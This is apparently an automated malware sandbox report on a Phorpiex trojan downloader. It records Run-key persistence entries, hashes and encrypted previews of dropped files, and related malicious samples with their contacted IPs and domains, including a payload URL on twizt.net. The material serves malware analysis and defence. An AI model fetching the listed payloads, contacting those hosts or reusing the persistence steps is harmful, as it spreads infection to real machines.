                                                Start date and time:2024-05-08 15:21:12 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 29s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:20
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@23/24@3/57
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 76
                                                • Number of non-executed functions: 230
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.72.235.82
                                                • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, www.update.microsoft.com, ctldl.windowsupdate.com
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                TimeTypeDescription
                                                15:22:15AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysbrapsvc.exe
                                                15:22:16API Interceptor2447431x Sleep call for process: sysbrapsvc.exe modified
                                                15:22:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Service C:\Users\user\winploravr.exe
                                                15:22:52AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Service C:\Windows\winploravr.exe
                                                15:23:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Service C:\Users\user\winploravr.exe
                                                15:23:37API Interceptor5x Sleep call for process: 1146722911.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                212.154.184.158SecuriteInfo.com.Trojan.Siggen21.19151.20597.8736.exeGet hashmaliciousPhorpiexBrowse
                                                  2.133.220.58file.exeGet hashmaliciousPhorpiexBrowse
                                                    109.168.235.213file.exeGet hashmaliciousPhorpiexBrowse
                                                      5.219.253.209I7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                        111.9.3.39I7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                          80.80.214.50file.exeGet hashmaliciousPhorpiexBrowse
                                                            91.92.206.184file.exeGet hashmaliciousPhorpiexBrowse
                                                              82.194.11.2957C4XK6Lt.exeGet hashmaliciousPhorpiexBrowse
                                                                91.202.233.141I7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                • 91.202.233.141/4
                                                                82.200.224.194I7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                  o3N9Cy4cvC.exeGet hashmaliciousPhorpiexBrowse
                                                                    87.237.239.65file.exeGet hashmaliciousPhorpiexBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      mta7.am0.yahoodns.netSecuriteInfo.com.Win32.BotX-gen.31335.5127.exeGet hashmaliciousTofseeBrowse
                                                                      • 67.195.204.73
                                                                      file.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 67.195.228.111
                                                                      file.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 98.136.96.77
                                                                      RqrQG7s66x.dllGet hashmaliciousUnknownBrowse
                                                                      • 67.195.204.79
                                                                      3pYA64ZwEC.exeGet hashmaliciousUnknownBrowse
                                                                      • 98.136.96.77
                                                                      newtpp.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 98.136.96.91
                                                                      7b8wRbnmKu.exeGet hashmaliciousUnknownBrowse
                                                                      • 67.195.204.79
                                                                      file.msg.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 67.195.204.79
                                                                      l3Qj8QhTYZ.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 98.136.96.76
                                                                      .exeGet hashmaliciousUnknownBrowse
                                                                      • 67.195.228.111
                                                                      twizt.netI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 185.215.113.66
                                                                      957C4XK6Lt.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 185.215.113.66
                                                                      spl.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.215.113.66
                                                                      spl.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.215.113.66
                                                                      http://twizt.net/spl.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.215.113.66
                                                                      http://twizt.net/spl.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.215.113.66
                                                                      XnUEBMnOEd.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.215.113.66
                                                                      XnUEBMnOEd.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.215.113.66
                                                                      Document.doc.lnkGet hashmaliciousMalLnkBrowse
                                                                      • 185.215.113.66
                                                                      Document.doc.lnkGet hashmaliciousMalLnkBrowse
                                                                      • 185.215.113.66
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ISPETCUZfile.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 217.30.163.6
                                                                      file.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 89.236.216.14
                                                                      file.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 217.30.163.15
                                                                      3A1J69z1t7.elfGet hashmaliciousMiraiBrowse
                                                                      • 217.30.172.124
                                                                      mKVBAPvSpM.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 217.30.160.221
                                                                      etiGLVC4Wj.elfGet hashmaliciousMiraiBrowse
                                                                      • 217.30.172.167
                                                                      GXKDh1UKH7.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 87.237.239.105
                                                                      file.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                      • 87.237.236.52
                                                                      TXh7zCXtrk.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                      • 87.237.236.52
                                                                      file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                      • 217.30.169.113
                                                                      TPSUZ-ASUZ957C4XK6Lt.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 89.236.226.70
                                                                      file.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 89.236.196.245
                                                                      28SY8i9x72.elfGet hashmaliciousMiraiBrowse
                                                                      • 89.236.193.113
                                                                      ajNjvSIXbo.elfGet hashmaliciousMiraiBrowse
                                                                      • 89.236.193.105
                                                                      SecuriteInfo.com.Trojan.Siggen21.19151.20597.8736.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 185.248.44.169
                                                                      3X3LctXa5d.elfGet hashmaliciousMiraiBrowse
                                                                      • 62.209.149.254
                                                                      file.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 89.236.196.245
                                                                      E-IMZO-v4.47.exeGet hashmaliciousUnknownBrowse
                                                                      • 89.236.209.82
                                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                                      • 89.236.243.97
                                                                      http://tzmk.uz/sitemapn/cs.php/?email=test.test@test.comGet hashmaliciousUnknownBrowse
                                                                      • 62.209.128.119
                                                                      KAZTELECOM-ASKZI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 92.47.228.51
                                                                      240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                                                                      • 2.132.55.153
                                                                      5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zipGet hashmaliciousXmrigBrowse
                                                                      • 95.57.233.38
                                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 84.240.246.191
                                                                      L31owFeEHg.elfGet hashmaliciousMiraiBrowse
                                                                      • 147.30.189.71
                                                                      zWOxRE8mXb.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 2.132.64.107
                                                                      3P4acRdms1.elfGet hashmaliciousMiraiBrowse
                                                                      • 178.91.19.72
                                                                      GSzQSyqWKB.elfGet hashmaliciousMiraiBrowse
                                                                      • 95.57.49.126
                                                                      spQm3NLQtH.elfGet hashmaliciousUnknownBrowse
                                                                      • 5.251.102.212
                                                                      ZMDO0vznFx.elfGet hashmaliciousUnknownBrowse
                                                                      • 5.76.224.127
                                                                      M247GBI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                      • 91.202.233.141
                                                                      20240506_120821.batGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                                      • 194.187.251.115
                                                                      4ZgjosOSkq.elfGet hashmaliciousMiraiBrowse
                                                                      • 38.207.172.124
                                                                      http://movierr.site.Get hashmaliciousUnknownBrowse
                                                                      • 185.200.116.51
                                                                      bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 38.203.241.133
                                                                      bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                      • 158.46.140.162
                                                                      fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                      • 194.187.251.115
                                                                      c8sDO7umrx.exeGet hashmaliciousCMSBruteBrowse
                                                                      • 31.14.252.98
                                                                      p67UidesWn.elfGet hashmaliciousMiraiBrowse
                                                                      • 38.202.251.236
                                                                      nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                      • 194.187.251.115
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\1245832676.exeI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                        C:\Users\user\AppData\Local\Temp\1146722911.exeI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                          C:\Users\user\AppData\Local\Temp\2303012543.exeI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                            C:\Users\user\AppData\Local\Temp\2006625995.exeI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:false
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9224
                                                                              Entropy (8bit):7.977416257764991
                                                                              Encrypted:false
                                                                              SSDEEP:192:pjMFUgMn+YaK7UiPMkwGRDIpEQjKn31QmvjgbLVa:pcx47vPdRjR31QmvUbLE
                                                                              MD5:4C12165BC335A32CB559C828484A86A6
                                                                              SHA1:C2E78C57F15A1A3A190BE415AAC3D1E3209CE785
                                                                              SHA-256:4831BD83C39EC9D898CCC1023858C81A03326B7C1C5DD8E24FDF9B2171707D1A
                                                                              SHA-512:F44DF78B6F16255496B2FA35E28C185011C2BEBF47730A68FD1369ABF87F390684A8786A167319319D14A12DA3768C1EDEF8E36037CDE339A1FFE8C62C3EA87B
                                                                              Malicious:false
                                                                              Preview:NGS!............tn..B...... mW.2...L..#:...~..1M.F.\T.O...m.../..<.....c.....C.;U.7.L4U.M,%.7.Z./N...[d......P.oS.\.M...\.rU.9y......BD.U..5.q..}.i....C.Bv..Zy]k...:..a.6.#}];).2..^".....iv...N...mo_A...._.z.#.Q~n..........ox..q...J.dQ!ys0...2-.N.d5:..A......Z.,sb.2...2.i1s.z..0.T..0.&.NQ'j<...B.[.p...y........;..H...0.<..yK.....k6G\l...NC...=.....c..t{.M..sT.h..Z.XlT..?S/Q0..L.........f.ZW,.M......if.. \AM.....F'b..h.lJ.>....x.....I.2.....Z..*X..eG....)W.8'.Q.L...T....c.=...>Dw.,.N.M?...0.....N.".!2 .`.._j8*.`......F.y$...D7....EjY.....O&.$..b..o+.zNAN.Meuume.BV..5.(.....%.V..hR....Yt.N...L(2=;..Dp.s..u..b..x.Al......|s..........,..d.2....-..E..`.......pw. .*..vh....+.GO>.. ....Ingx..CmFh{2..Z7.|..k..|.`{E..#..&V....V..)A.>..G>#.....(....#.,.#..>K....X..F=..p"i...e..h..p.....7...wmt..,.TN...U...I.~..,~..i.P~V}..fl.j7.z.._RJ....L..........dY...K......j<y...D.VTmT@......G....=.G....E..Q...l....k..>.n.......Q....i....^..a.4...|Qp^<..r4.
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):15104
                                                                              Entropy (8bit):7.9890048960040705
                                                                              Encrypted:false
                                                                              SSDEEP:384:ftmlGG+Pu/uXQUEjiLr3Jv20OBIsv/hwFepObA2Ii0c8whMu:VoGpXQFi3Jv20OCsvuQ32645
                                                                              MD5:A3E6EEAC83CB1FE25E107176B20CFAC3
                                                                              SHA1:944177D2FAF1D8082B61D04AA9892D4390D4E515
                                                                              SHA-256:BDA7446502602C2AD20D9F0CA1D1031B993C2ADCB12773D0AD85611354EA8964
                                                                              SHA-512:D0777594941613F7A26708250D4BAD6AE4E9335A8C159C6F1B629C6E29A6AE812CFC6FED014182B081961C0C8C59FC55A15D03A939C97CB7C4C1ECDF57555461
                                                                              Malicious:false
                                                                              Preview:K.#...yB..H.Iz....7.N.......Ml..C..P..o.).3....4....|b.b.a..j..=."p.x.......a.H'...v...n.....H?....?.FO.....sG..b....n.......[...d.O,F...c...Z......UP.|...`..q.%<aSd.../...vZ,..gxYg..|....L.t&.{.....=...r..%.M...G..o......H..]#.y|...X.L....."J.0.L0.....w.J......-F..._i.....E...t...:..7%....<.G_.....K........n7C!.......X..Y.....=.{..G.R.....s...w.!..0l..0[.!..^i..r.P.:X$B....(......<:.....&.a.xtQ.L...[.y...<1:8c....Ji{Cw).Vx..&.`[...g..F.........kW?.*....(...5p..n....H..$.~.vL%i.._.oZ4..S.*~R.6.0..i.[....y. ?JD.........!..sn.9a.....:.z.^.E...e'.4G~...*.U.LV..*<.`9o8......X..'.......63..d....d4...ki..Z.Y.!I........v..K.<i.....H6H.mMU.>.}L.&....0d..{......R.!.....A7.R..Z..i.("...;..b.%Y......0....#J..2@B.s...:...g...@....h.{.^..G.<.......[Y/x6s.*e.Z8..e......tZ......=N......O.`-...,..S..T..e..pH...7[.:w...f4.kE.5)...M.m.{:<...t..W.....;?.....U.`.y........E.*0.n.k......(D}..=O..LX.....9.i.,.,a~..p..Y..Z...A....../... q....D........_
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9224
                                                                              Entropy (8bit):7.977416257764991
                                                                              Encrypted:false
                                                                              SSDEEP:192:pjMFUgMn+YaK7UiPMkwGRDIpEQjKn31QmvjgbLVa:pcx47vPdRjR31QmvUbLE
                                                                              MD5:4C12165BC335A32CB559C828484A86A6
                                                                              SHA1:C2E78C57F15A1A3A190BE415AAC3D1E3209CE785
                                                                              SHA-256:4831BD83C39EC9D898CCC1023858C81A03326B7C1C5DD8E24FDF9B2171707D1A
                                                                              SHA-512:F44DF78B6F16255496B2FA35E28C185011C2BEBF47730A68FD1369ABF87F390684A8786A167319319D14A12DA3768C1EDEF8E36037CDE339A1FFE8C62C3EA87B
                                                                              Malicious:false
                                                                              Preview:NGS!............tn..B...... mW.2...L..#:...~..1M.F.\T.O...m.../..<.....c.....C.;U.7.L4U.M,%.7.Z./N...[d......P.oS.\.M...\.rU.9y......BD.U..5.q..}.i....C.Bv..Zy]k...:..a.6.#}];).2..^".....iv...N...mo_A...._.z.#.Q~n..........ox..q...J.dQ!ys0...2-.N.d5:..A......Z.,sb.2...2.i1s.z..0.T..0.&.NQ'j<...B.[.p...y........;..H...0.<..yK.....k6G\l...NC...=.....c..t{.M..sT.h..Z.XlT..?S/Q0..L.........f.ZW,.M......if.. \AM.....F'b..h.lJ.>....x.....I.2.....Z..*X..eG....)W.8'.Q.L...T....c.=...>Dw.,.N.M?...0.....N.".!2 .`.._j8*.`......F.y$...D7....EjY.....O&.$..b..o+.zNAN.Meuume.BV..5.(.....%.V..hR....Yt.N...L(2=;..Dp.s..u..b..x.Al......|s..........,..d.2....-..E..`.......pw. .*..vh....+.GO>.. ....Ingx..CmFh{2..Z7.|..k..|.`{E..#..&V....V..)A.>..G>#.....(....#.,.#..>K....X..F=..p"i...e..h..p.....7...wmt..,.TN...U...I.~..,~..i.P~V}..fl.j7.z.._RJ....L..........dY...K......j<y...D.VTmT@......G....=.G....E..Q...l....k..>.n.......Q....i....^..a.4...|Qp^<..r4.
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9224
                                                                              Entropy (8bit):7.977416257764991
                                                                              Encrypted:false
                                                                              SSDEEP:192:pjMFUgMn+YaK7UiPMkwGRDIpEQjKn31QmvjgbLVa:pcx47vPdRjR31QmvUbLE
                                                                              MD5:4C12165BC335A32CB559C828484A86A6
                                                                              SHA1:C2E78C57F15A1A3A190BE415AAC3D1E3209CE785
                                                                              SHA-256:4831BD83C39EC9D898CCC1023858C81A03326B7C1C5DD8E24FDF9B2171707D1A
                                                                              SHA-512:F44DF78B6F16255496B2FA35E28C185011C2BEBF47730A68FD1369ABF87F390684A8786A167319319D14A12DA3768C1EDEF8E36037CDE339A1FFE8C62C3EA87B
                                                                              Malicious:false
                                                                              Preview:NGS!............tn..B...... mW.2...L..#:...~..1M.F.\T.O...m.../..<.....c.....C.;U.7.L4U.M,%.7.Z./N...[d......P.oS.\.M...\.rU.9y......BD.U..5.q..}.i....C.Bv..Zy]k...:..a.6.#}];).2..^".....iv...N...mo_A...._.z.#.Q~n..........ox..q...J.dQ!ys0...2-.N.d5:..A......Z.,sb.2...2.i1s.z..0.T..0.&.NQ'j<...B.[.p...y........;..H...0.<..yK.....k6G\l...NC...=.....c..t{.M..sT.h..Z.XlT..?S/Q0..L.........f.ZW,.M......if.. \AM.....F'b..h.lJ.>....x.....I.2.....Z..*X..eG....)W.8'.Q.L...T....c.=...>Dw.,.N.M?...0.....N.".!2 .`.._j8*.`......F.y$...D7....EjY.....O&.$..b..o+.zNAN.Meuume.BV..5.(.....%.V..hR....Yt.N...L(2=;..Dp.s..u..b..x.Al......|s..........,..d.2....-..E..`.......pw. .*..vh....+.GO>.. ....Ingx..CmFh{2..Z7.|..k..|.`{E..#..&V....V..)A.>..G>#.....(....#.,.#..>K....X..F=..p"i...e..h..p.....7...wmt..,.TN...U...I.~..,~..i.P~V}..fl.j7.z.._RJ....L..........dY...K......j<y...D.VTmT@......G....=.G....E..Q...l....k..>.n.......Q....i....^..a.4...|Qp^<..r4.
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):101120
                                                                              Entropy (8bit):7.998324560926195
                                                                              Encrypted:true
                                                                              SSDEEP:3072:ylQk1QqImOYSPsra4ex/QySz0boQn6tmeVfa:Lk+qImOYtrazx6zcoQ6tmeVfa
                                                                              MD5:F7BD7349C6ADCD545464390D66B5FAC8
                                                                              SHA1:8D421E11DFE55E7BFFECDE4BDC215D934BD45F64
                                                                              SHA-256:65B1908907D7C09AFF6335C9B6DE0280E1D03345A95A04A8062C9068180CE018
                                                                              SHA-512:8873319FD39D17954337E4FE8EC4C09C273D458406B3672FCCA01418BF68E8BC962C53492A2EC88E5F9C4B3CFA98285711B2ACD76D4B18ADA9B981D82EBE5B63
                                                                              Malicious:false
                                                                              Preview:/.;."..~....%...n.8g.=Gg.h.$*..}^.S....S].....J."P.h...-....Q.y...022G.m.T.f..<...nd.1.?...^.R...B...x...lGU?..6...7....Gj.....<..h=.2..\...z.....R....9>`RQ ...3$.G.s..;.%.e...Ux..&....o[.x.Q..1..d..;..]o..i>B3`.........-........i.T...>MV/...._My..a.pxvB.u.=)esA9..l..=|....p...4N$h.....O`..; ...~...;.w_..7b.f...2....J..6...%...9.K2!.....P.ee.....Q...f.Y.wI.....f5.*.9....Bs.....:L7-..l.g.w../nlOsk,...c..$Mt...7=.PG...K..N.6.E..Dy!...Ig.6..Y..t7.exU]5...{Yl.+..5..Z....N....'."..'..zZ}K2~.:/.U..~1.\M...^..l..x..1M8...../.5...0.>f.{V....G%w.. ...u..VT.....o......=....?...Z.....U..c..~.t.M.t....o...|......;....q..{x...]+...^(....qp.m.KA...<q....v...v9'.b......T..../..G.p_.e......,...7...o.....s?g.&|.d.(..v[.d.........}..|X...a...1..j...v&......B.7j......\.o..|N!i/u....,.o#/..v..]..1....&.o.3.T...}.....l......{...fKV_E.-&.!.....1.~u.Z0}_....+_.i.|....s.V..!...B....[.@L;.;..l.e.....;f........G.r..<..i7.D.LP.`.}8..y.#..W.q.O......)h/...E
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):22272
                                                                              Entropy (8bit):7.991147590382041
                                                                              Encrypted:true
                                                                              SSDEEP:384:XD5E45+KzGUysR3CqHUbX+Sy1IRkFrSFGL+sL9wzzsVvh0vGDaAf5MLBy2wi:XD5E++Kqs5CZX+8QriGLTJwzzGvh0unu
                                                                              MD5:8529E7928CF84C780752624128CA7C40
                                                                              SHA1:20E9A4825C7B0B4648B645F757D1D3D24482576E
                                                                              SHA-256:DE98409082B36BDA87330EB30A310ABDB14394F762BDF18E4EF1C28A4DF8416F
                                                                              SHA-512:83DC247CCCB577ACA55A879B74E289B1CC6F170BC933BF026F77B97A33394DE77C72A4AEE761D1B9FBA89C24C21A7CF195DE42CE9F71184A0597F6C1ABF7D049
                                                                              Malicious:false
                                                                              Preview:... .D....{...U..!h.P..Y..s.v&...C2:S.6.........Y...r.2Z...|..........[z.M...wxtQ..?..k.8#.G`f..F..aXM|..s:........?...T.fL..h.*.3..<..UM0.G..5...t.y@0^V..|.N)H.....+.L....3..\L...t-..|....~.U.;.;...".%.. ..4+:yd..k....h_....I.%h.:....;..9.TxA.....,.......~C.}+.8*....z......).iB..l...w.G..m......k7;.L~6.4.P.j.|..h.sPv..N(.....~......&rf&5.....a|7..{..J.t.......\..JW...... be..)....k1:......Z.7..N...p'P.=Q8.4....D..x8A...s..b.i....$5.6...R.......2..*)K3.WL..Zp..P&..&J{=...c.C.....zh.Zj.B..B.[...!N.>..:....9.*v.=...L...F.C.#GO..\.. .Y6.S.{.g.f..|=.z.l......A...=R.0.Dq.h..}..R....N..@..yW..h....Q...T.W..T...D....S{9IY.A..fE...",..K....*......UtK...h.)3/.f4Q.Wi.#@..N.Z.~q.P......p....63.!...c.E..e..V..6..T.8.....`.k..?)...x.\]<S........b.A2..xK....?..... ...X&....|Lx..v..g(8YD........NL+....o=.(zu..j..2.......@.J..j...'..6=..m..;.......A..?.<J....X+.K...^(.$....1..i.......+:.R..2..|q.n.....C.o4.j.d....=......G.....s%./..'..A+..h".....wj.i..
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8960
                                                                              Entropy (8bit):7.977787290929729
                                                                              Encrypted:false
                                                                              SSDEEP:192:AlX/Tw8qMTMejWl6IfEJkXjqREnfj9kCr6OKSF:ET5RwJlrEGGmnr9kzOK4
                                                                              MD5:8D82457B70C900A2424B5102FB14B488
                                                                              SHA1:4AD15F68CA90468BFDADAA66D1EF7CE2E973621D
                                                                              SHA-256:6D0BB70919D36B939773006943CF62BB871D1CA7B51D2518F5197931DC1A0949
                                                                              SHA-512:9DFD54FDD18B33FEDD0B91080FD45B7931B4A52C27DDD91B39444BCB52FCEDD6EF3E6400E681435A6839F9388848D173A7CDE10B6497DECD4095A2A4829545AB
                                                                              Malicious:false
                                                                              Preview:n}._.JE.......y.cv6.3.LutJ.x.<....&RygE.p.:K6.....q..j.dq~......8#<&...g.u...~V.......b]....RR."-W.5....4T.z.7ZA.g......M];3UG.)H...5a.'u.b........W.?..dc.s.^..B..`B...;.%'z...7J.hqm+..a.V.6O.U..k....$.(....KfdKP{.......M"...sGHo.....L].....-=(./........3l.@a.[....oxC...U.<-.5..x...g....\*=.g. B...nRZ.t..X}.i_...-...&:U.c..RSTud...^....3.......n.<.....Y...y.i.i..I..e.....t.wjE.J.Ie...9...n...[.~R....T...z.~-.g. .e.K.qB.g..a-2...b.g.e...G.\Kk.-.M........5..6...6.8.G...jj.+...N<"..A.Y..<..A0.P...M.X.Zd...lL...PVe..vy2......l.H.S2>...Nn.<..p5q7R......p..et \...w\.3]O.z..W.t...\<7..$.......Z./..BN.eo.....q#......q4..V..5r0....%)....-........`.....9u.......%:......oF8L...i~}.W.J.3VV..0}.4t.VT[...............O.+2..7G.t............!..r...........n.<DI3.K..I=.....0..F..l...L..W~.^.'..A..m~U<l..ab.+.GI...J..rK....Ef`..0t}0^.."..q....'..;..1..........q..1.......?n.=*.:.N.Or.sGD...j....w....._..Hi`..D.k..k..H...jA.f.i....\.&..y5......7..v...
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11520
                                                                              Entropy (8bit):7.984543174347643
                                                                              Encrypted:false
                                                                              SSDEEP:192:nZaAKeBJXLWfMbUK6ArAprlYP6Ci20/xETikQF9DKr8XN5Rf6D:ZaFeBJXLWfmrAdlK6T6iXE80D
                                                                              MD5:5C2F49DD60A69E1D1AAA39F872551585
                                                                              SHA1:BDD4B2CAFA1779CF61C7BADFB7833EE4C953EFAD
                                                                              SHA-256:BABF2231A52BFE5C7DBD026F80CE2494811EC706637D13C24EECA071E23F35D2
                                                                              SHA-512:46F3845C05D710AE5084FD6AABCE9BE7C2C8B0DD7A0B65472A5A736F7BBEB1F4904093FF29D03463008F8D77905EC4C940A7E3A3B124C937EBF3251C332164C9
                                                                              Malicious:false
                                                                              Preview:Mi.f.........Oxy.rE.r.W.3..(.[1r..<g?..p...R=..{.e%2...s......5..\.s.[..Y.......C.b../.>U..W.R'..:...lC...s.,.f}..).O....%^w>./..B.1.........B?...9.........sn.b...(..U.qP+..b@.9.5..1....).}..q..4..s.Of....kS.....i...n).>|S/v5F .7H..U.6....C20q..3C..01.........0..|Z7.U.(o.^....x*...J....X..yM.z........:..#^...E[....q3........L..\.?.w..5..T_..Z...A#.[j..qU.yG. ).....1.....a.]..rbwlZQ..ua...f...bn..pn..3,.k#.....k...!..rq..B...9O....8X...Y......%pQ....fC.8..GD.oyPyWo?!./nZz.K.|.....C........[...-.E...gE..eGpwu.y..h.%.,.5.G.......j...JP.!..mm.H.Qr..)o..V.....J<..Wh#<.."T..f.+8}K4..&sR'{.n..L.g..u9N..Y.R.s.....^.sA......7.G.....2..m..I.8.Yj..{........*%a..U=Xg....&TR.g....&.B5w..ir.oW.+..8.dln.r..t..h..w...ID&.4..P..".T@U.j....'...E_.rM.zA..l!F......}f......su.n..fb..3..#....C4..&@.@G1.. ..i..oC..,.WA..Zw.....d3!.Ls...F=. .....?.T...{ .......R.*.M.].V?:HK../../...|.f"?....6ed..f.IM......."..3...\Dy......s.....:y.KhNFwY."o...Q..t..yF....t9.....
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
